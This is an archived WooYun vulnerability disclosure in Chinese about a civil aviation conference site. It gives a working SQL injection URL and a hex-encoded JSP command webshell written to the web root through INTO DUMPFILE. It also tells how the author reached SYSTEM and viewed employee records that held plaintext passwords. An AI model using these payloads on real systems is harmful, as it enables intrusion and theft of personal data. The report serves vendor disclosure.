中国民航某站SQL+xxe+任意文件上传（SYSTEM权限/大量内部5千多员工信息/邮箱/名字/电话/部门/明文密码/密文.....）

2017年4月15日06:53:27评论345 views字数 284阅读0分56秒阅读模式

摘要

2016-04-02：细节已通知厂商并且等待厂商处理中
2016-04-06：厂商已经确认，细节仅向厂商公开
2016-04-16：细节向核心白帽子及相关领域专家公开
2016-04-26：细节向普通白帽子公开
2016-05-06：细节向实习白帽子公开
2016-05-21：细节向公众公开

漏洞概要关注数(22) 关注此漏洞

缺陷编号： WooYun-2016-191732

漏洞标题：中国民航某站SQL+xxe+任意文件上传（SYSTEM权限/大量内部5千多员工信息/邮箱/名字/电话/部门/明文密码/密文.....）

漏洞作者：路人甲

提交时间： 2016-04-02 17:10

公开时间： 2016-05-21 11:50

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

4人收藏

漏洞详情

披露状态：

简要描述：

中国民航某站SQL+任意文件上传（SYSTEM权限/内部5千多员工信息/邮箱/名字/电话/部门/密码.....）

详细说明：

漏洞站点：

**.**.**.**:8080/Conf/jsp/main/mainAction.do

（此站点是属于中国民航集团的，后面会验证说明）

0x001：SQLi

**.**.**.**:8080/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,version(),5%23

参数sysId 存在注入，root权限

0x002:webservice服务存在blind xxe

**.**.**.**:8080/Conf/services/ConferenceWebService?wsdl

具体详情：http://**.**.**.**/bugs/wooyun-2015-0143276

0x003：getshell

直接POST 数据包：

code 区域

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
 Host: **.**.**.**
 Proxy-Connection: keep-alive
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: zh-CN,zh;q=0.8 
 Content-Length: 995
 Content-Type: application/x-www-form-urlencoded
 
 sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/wooyun.jsp'%23

shell地址：**.**.**.**:8080/wooyun.jsp

直接SYSTEM权限

nt authority/system

通过在管理员的桌面看到民航的敏感信息，而且全部都是放在桌面上的。。

C:/Users/Administrator/Desktop/

5千多内部员工的信息

桌面上的数据库文件包含员工的名字账号邮箱密码部门。。。。

有的数据库密码是明文 C:/Users/Administrator/Desktop/conference/confdb.sql

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-04-06 11:43

厂商回复：

CNVD未复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(22) 关注此漏洞

缺陷编号： WooYun-2016-191732

漏洞标题： 中国民航某站SQL+xxe+任意文件上传（SYSTEM权限/大量内部5千多员工信息/邮箱/名字/电话/部门/明文密码/密文.....）

相关厂商： 中国民航信息集团公司

漏洞作者： 路人甲

提交时间： 2016-04-02 17:10

公开时间： 2016-05-21 11:50

漏洞类型： 文件上传导致任意代码执行

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

4人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(22) 关注此漏洞

漏洞标题：中国民航某站SQL+xxe+任意文件上传（SYSTEM权限/大量内部5千多员工信息/邮箱/名字/电话/部门/明文密码/密文.....）

相关厂商：中国民航信息集团公司

漏洞作者：路人甲

漏洞类型：文件上传导致任意代码执行

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：无

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分